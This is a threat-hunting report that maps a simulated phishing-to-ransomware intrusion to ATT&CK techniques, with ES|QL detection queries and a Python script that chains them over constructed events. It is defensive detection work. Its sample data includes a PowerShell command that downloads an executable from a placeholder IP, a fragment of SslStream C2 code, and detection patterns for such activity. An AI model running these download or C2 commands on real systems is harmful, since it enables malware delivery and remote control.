#9 LAVAEL: Report
At the end of the process, a report is produced that summarizes the Cyber Hunt Plan for the simulated scenario. For each step of the modelled adversary behaviour it records the ATT&CK technique, the hypothesis, the data source that was queried, the analytic that was run and the rule it triggered, so that a reader can follow the chain from initial access to impact and re-run every check.
Cyber Hunt Report Example
Malicious Activity Model:
T1566.001 Phishing: Spearphishing Attachment — An adversary group used spearphishing attachments to gain initial access to the target organization’s network by tricking users into opening malicious files.
Summary:
The original hypothesis was that the adversary conducted research on the company to gather details about certain employees’ interests. Based on this information, the adversary chose to use phishing as an initial access technique, targeting the victim’s interest in cryptocurrency to increase the likelihood of engagement.
Artifacts:
Data Source Used:
Sysmon Event ID 11 FileCreate, matched on the Zone.Identifier stream (Mark of the Web) that Chrome writes next to a completed download. If your Sysmon configuration does not surface the stream write under EID 11, EID 15 FileCreateStreamHash records the same write together with the stream contents.
Analytics Used:
FROM logs-* METADATA _id, _version, _index
| WHERE (event.code == "11")
AND process.name == "chrome.exe"
AND (file.name LIKE "*.zip:Zone.Identifier"
OR file.name LIKE "*.7z:Zone.Identifier"
OR file.name LIKE "*.rar:Zone.Identifier"
OR file.name LIKE "*.tar:Zone.Identifier"
OR file.name LIKE "*.gz:Zone.Identifier"
OR file.name LIKE "*.bz2:Zone.Identifier"
OR file.name LIKE "*.iso:Zone.Identifier"
OR file.name LIKE "*.exe:Zone.Identifier")
| KEEP @timestamp, event.code, process.entity_id, process.pid, process.name, file.name, file.hash.md5, file.hash.sha1, file.hash.sha256, _id, _version, _index
Rule triggered:
Suspicious Archive or Executable Download via Chrome
Malicious Activity Model:
T1560.001 Archive via Utility — The user unzips the downloaded file, extracting its contents, which may involve the use of utilities to unpack the archive.
Summary:
After the user opened the email and downloaded the attachment, Windows Explorer's built-in archive handling was used to extract the contents, exposing the executable hidden inside. Strictly, T1560.001 describes an adversary compressing collected data; a user unpacking a delivered archive belongs to the delivery and execution chain, but the hunt keeps it as a step of its own because the extraction leaves its own artifact: Explorer propagates the archive's Mark of the Web by writing a Zone.Identifier stream on the extracted file.
Artifacts:
Data Source Used:
Sysmon Event ID 15 FileCreateStreamHash (the event that carries the Zone.Identifier stream contents, which the query filters on as winlog.event_data.Contents)
Analytics Used:
FROM logs-* METADATA _id, _version, _index
| WHERE event.code == "15"
// ES|QL string comparison is case-sensitive and Sysmon records Explorer's image as Explorer.EXE, so fold case
AND TO_LOWER(process.name) == "explorer.exe"
AND (file.name LIKE "*.exe:Zone.Identifier")
AND (
winlog.event_data.Contents LIKE "*.zip*" OR
winlog.event_data.Contents LIKE "*.7z*" OR
winlog.event_data.Contents LIKE "*.rar*" OR
winlog.event_data.Contents LIKE "*.tar*" OR
winlog.event_data.Contents LIKE "*.gz*" OR
winlog.event_data.Contents LIKE "*.bz2*" OR
winlog.event_data.Contents LIKE "*.iso*"
)
| KEEP event.code, @timestamp, process.name, file.name, file.hash.md5, file.hash.sha1, file.hash.sha256, _id, _version, _index
Rule triggered:
Suspicious Archive Execution via Windows Explorer
Malicious Activity Model:
T1204.002 User Execution: Malicious File — The user then executes the .exe file extracted from the zip, resulting in the execution of malicious code.
Summary:
The user extracted the file, which was an executable. The program’s name was crafted to entice the user to run it, resulting in the execution of malicious code.
Artifacts:
Data Source Used:
Sysmon Event ID 1 Process Create
Analytics Used:
FROM logs-* METADATA _id, _version, _index
| WHERE (event.code == "1")
AND (
process.name LIKE "*.exe"
AND (
process.name LIKE "*wallet*"
OR process.name LIKE "*bitcoin*"
)
)
// Sysmon records the parent image as Explorer.EXE; == is case-sensitive, so fold case
AND TO_LOWER(process.parent.name) == "explorer.exe"
| KEEP event.code, @timestamp, process.entity_id, process.pid, process.name, file.hash.md5, file.hash.sha1, file.hash.sha256, _id, _version, _index
Rule triggered:
Suspicious Executable Launched via Windows Explorer
Malicious Activity Model:
T1573 Encrypted Channel — After execution, the malware establishes a command and control (C2) channel using encrypted communication to securely communicate with the adversary.
Summary:
The program executed by the user prompted for a password to "unlock the wallet." In reality this was a delaying tactic: while the user tried to guess the password, PowerShell code embedded in the program ran and established an encrypted connection to the C2 server.
Artifacts:
Data Source Used:
Process creation events carrying the full command line (Sysmon Event ID 1 or the Elastic Defend process integration; the event.category/event.action filter below is the ECS form). Note: this only catches PowerShell launched with the code inline on its command line. An -EncodedCommand or a script file leaves nothing for these patterns to match, and Script Block Logging (Event ID 4104) is the fallback.
Analytics Used:
FROM logs-* METADATA _id, _version, _index
| WHERE (event.category == "process" AND event.action == "start")
AND (
process.command_line LIKE "*System.Net.Security.SslStream*"
AND process.command_line LIKE "*AuthenticateAsClient*"
AND process.command_line LIKE "*GetBytes*"
)
| KEEP event.code, @timestamp, process.entity_id, process.pid, process.name, process.command_line, _id, _version, _index
Rule triggered:
Suspicious Encrypted C2 Channel Establishment
Malicious Activity Model:
T1059.001 Command and Scripting Interpreter: PowerShell — The adversary uses PowerShell to download additional malware from a remote server.
Summary:
After the malicious actor gained control, they found some interesting data and used PowerShell to download additional malicious programs, disguising them as wallet updates.
Artifacts:
Data Source Used:
PowerShell Script Block Logging (Event ID 4104, Microsoft-Windows-PowerShell/Operational). Note: LIKE is case-sensitive in ES|QL, and in Windows PowerShell 5.1 the aliases iwr, curl and wget resolve to the same cmdlet, so a production version should match on TO_LOWER(powershell.file.script_block_text) and include the aliases.
Analytics Used:
FROM logs-* METADATA _id, _version, _index
| WHERE event.code == "4104"
AND (
powershell.file.script_block_text LIKE "*Invoke-WebRequest*"
AND powershell.file.script_block_text LIKE "*http*"
AND (
powershell.file.script_block_text LIKE "*.exe*"
OR powershell.file.script_block_text LIKE "*.py*"
OR powershell.file.script_block_text LIKE "*.ps1*"
)
)
| KEEP event.code, @timestamp, process.entity_id, process.pid, process.name, powershell.file.script_block_text, _id, _version, _index
Rule triggered:
Suspicious PowerShell Web Request Execution
Malicious Activity Model:
T1486 Data Encrypted for Impact — The downloaded malware encrypts data in a specified folder to impact the organization.
Summary:
The attacker found some interesting data and used the previously downloaded program to encrypt the data, aiming to impact the organization.
Artifacts:
Data Source Used:
Elastic Defend (the Elastic Agent endpoint integration). Note: confirm the event.action value your integration emits for file creation before deploying (Elastic Defend file events carry event.category "file" with event.action "creation"). The .enc suffix and the threshold of five are scenario values; in production the count should also be bucketed by time, e.g. STATS ... BY process.executable, DATE_TRUNC(10 minutes, @timestamp), so that a slow, long-lived process does not accumulate a hit over days.
Analytics Used:
FROM logs-*
| WHERE event.action == "FileCreate"
AND process.executable LIKE "*.exe"
AND file.name LIKE "*.enc"
| STATS unique_files = COUNT_DISTINCT(file.name) BY process.executable
| WHERE unique_files > 5
| SORT unique_files DESC
| RENAME unique_files AS `Files`, process.executable AS `Process Executable`
| KEEP `Process Executable`, `Files`
Rule triggered:
Potential Ransomware Activity: Multiple Encrypted Files Created
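The six analytics above each answer one question on their own; what the report needs is evidence that the steps happened in order on the same host. The block below is an added example, not code from the original report: it reimplements each stage's ES|QL predicate in Python (field names as in the queries above, with case-folding so that Explorer.EXE and explorer.exe both match), parses the [ZoneTransfer] stream that the second query only substring-matches so the source archive path can be carried into the report as evidence, walks the stages in kill-chain order, and buckets the .enc count by time window. The sample events, the Downloads path, the file names and the 203.0.113.10 address are constructed for illustration and are not from the page.

```python
# Added example (not from the original report): the page's per-stage ES|QL analytics as Python
# predicates, chained in kill-chain order over constructed ECS-style events.
from collections import defaultdict
from datetime import datetime, timedelta, timezone

ARCHIVE_EXTS = (".zip", ".7z", ".rar", ".tar", ".gz", ".bz2", ".iso")

def _lower(ev, key):
    """Case-folded field access: Sysmon keeps image casing (Explorer.EXE vs explorer.exe)."""
    return str(ev.get(key, "")).lower()

def parse_zone_identifier(contents):
    """Parse the [ZoneTransfer] block that Sysmon EID 15 records in Contents into a dict."""
    pairs = (line.split("=", 1) for line in contents.replace("\r\n", "\n").split("\n") if "=" in line)
    return {k.strip(): v.strip() for k, v in pairs}

def is_chrome_archive_download(ev):
    """Stage 1 (T1566.001): Chrome writes a Zone.Identifier stream for an archive or .exe."""
    name = _lower(ev, "file.name")
    return (ev.get("event.code") == "11" and _lower(ev, "process.name") == "chrome.exe"
            and name.endswith(":zone.identifier")
            and name.rsplit(":", 1)[0].endswith(ARCHIVE_EXTS + (".exe",)))

def is_explorer_extraction(ev):
    """Stage 2: Explorer stamps an extracted .exe whose zone stream names an archive."""
    return (ev.get("event.code") == "15" and _lower(ev, "process.name") == "explorer.exe"
            and _lower(ev, "file.name").endswith(".exe:zone.identifier")
            and any(ext in _lower(ev, "winlog.event_data.Contents") for ext in ARCHIVE_EXTS))

def is_lure_execution(ev):
    """Stage 3 (T1204.002): a wallet/bitcoin-named .exe launched by Explorer."""
    name = _lower(ev, "process.name")
    return (ev.get("event.code") == "1" and name.endswith(".exe") and ("wallet" in name or "bitcoin" in name)
            and _lower(ev, "process.parent.name") == "explorer.exe")

def is_sslstream_launch(ev):
    """Stage 4 (T1573): inline PowerShell that builds an SslStream client on its command line."""
    cmd = _lower(ev, "process.command_line")
    return (ev.get("event.category") == "process" and ev.get("event.action") == "start"
            and all(s in cmd for s in ("system.net.security.sslstream", "authenticateasclient", "getbytes")))

def is_web_download_block(ev):
    """Stage 5 (T1059.001): a 4104 script block fetching an executable or script over HTTP."""
    text = _lower(ev, "powershell.file.script_block_text")
    return (ev.get("event.code") == "4104" and "invoke-webrequest" in text and "http" in text
            and any(ext in text for ext in (".exe", ".py", ".ps1")))

# (label, predicate, evidence carried into the report), in kill-chain order.
STAGES = [
    ("T1566.001 download", is_chrome_archive_download, lambda e: e["file.name"]),
    ("T1560.001 extraction", is_explorer_extraction,
     lambda e: parse_zone_identifier(e["winlog.event_data.Contents"]).get("ReferrerUrl", "")),
    ("T1204.002 execution", is_lure_execution, lambda e: e["process.name"]),
    ("T1573 encrypted C2", is_sslstream_launch, lambda e: e["process.name"]),
    ("T1059.001 download tool", is_web_download_block, lambda e: e["powershell.file.script_block_text"]),
]

def _ts(ev):
    return datetime.fromisoformat(ev["@timestamp"].replace("Z", "+00:00"))

def hunt_chain(events, host=None):
    """Walk STAGES on one host; each stage must fire at or after the previous stage's hit."""
    ordered = sorted((e for e in events if host is None or e.get("host.name") == host), key=_ts)
    hits, cursor = [], datetime.min.replace(tzinfo=timezone.utc)
    for label, pred, evidence in STAGES:
        hit = next((e for e in ordered if _ts(e) >= cursor and pred(e)), None)
        if hit is None:
            break  # chain broken: report only the stages confirmed so far
        hits.append((label, evidence(hit)))
        cursor = _ts(hit)
    return hits

def encrypted_file_counts(events, window=timedelta(minutes=10), threshold=5):
    """Stage 6 (T1486): the page's STATS over distinct *.enc creations, bucketed by time window."""
    buckets = defaultdict(set)
    for ev in events:
        exe = ev.get("process.executable", "")
        if (ev.get("event.action") == "FileCreate" and exe.lower().endswith(".exe")
                and _lower(ev, "file.name").endswith(".enc")):
            buckets[(exe, int(_ts(ev).timestamp() // window.total_seconds()))].add(ev["file.name"])
    out = {}
    for (exe, _), files in buckets.items():
        if len(files) > threshold:
            out[exe] = max(out.get(exe, 0), len(files))
    return out

# Constructed sample telemetry (not real logs); field casing deliberately mirrors the page's queries.
DL = "C:\\Users\\alice\\Downloads\\"
SAMPLE_EVENTS = [
    {"@timestamp": "2024-05-01T09:00:00Z", "event.code": "11", "process.name": "chrome.exe",
     "file.name": DL + "BitcoinWallet.zip:Zone.Identifier"},
    {"@timestamp": "2024-05-01T09:01:10Z", "event.code": "15", "process.name": "Explorer.EXE",
     "file.name": DL + "BitcoinWallet\\BitcoinWallet.exe:Zone.Identifier",
     "winlog.event_data.Contents": "[ZoneTransfer]\r\nZoneId=3\r\nReferrerUrl=" + DL + "BitcoinWallet.zip\r\n"},
    {"@timestamp": "2024-05-01T09:02:05Z", "event.code": "1", "process.name": "BitcoinWallet.exe",
     "process.parent.name": "explorer.exe"},
    {"@timestamp": "2024-05-01T09:02:30Z", "event.category": "process", "event.action": "start",
     "process.name": "powershell.exe", "process.command_line": "powershell -nop -c \"...New-Object "
     "System.Net.Security.SslStream...AuthenticateAsClient(...)...GetBytes(...)\""},
    {"@timestamp": "2024-05-01T09:10:00Z", "event.code": "4104", "powershell.file.script_block_text":
     "Invoke-WebRequest -Uri http://203.0.113.10/wallet_update.exe -OutFile wallet_update.exe"},
] + [{"@timestamp": f"2024-05-01T09:15:0{i}Z", "event.action": "FileCreate", "process.executable": DL + "wallet_update.exe",
      "file.name": f"C:\\Share\\Finance\\q{i}.xlsx.enc"} for i in range(6)]
```

Calling hunt_chain(SAMPLE_EVENTS) returns the five confirmed stages with their evidence, the second of which is the archive path recovered from the ReferrerUrl line of the stream rather than the raw Contents string; dropping the first event shows the chain refusing to start without the download stage, and encrypted_file_counts(SAMPLE_EVENTS) reports the six distinct .enc files written by wallet_update.exe inside one ten-minute window.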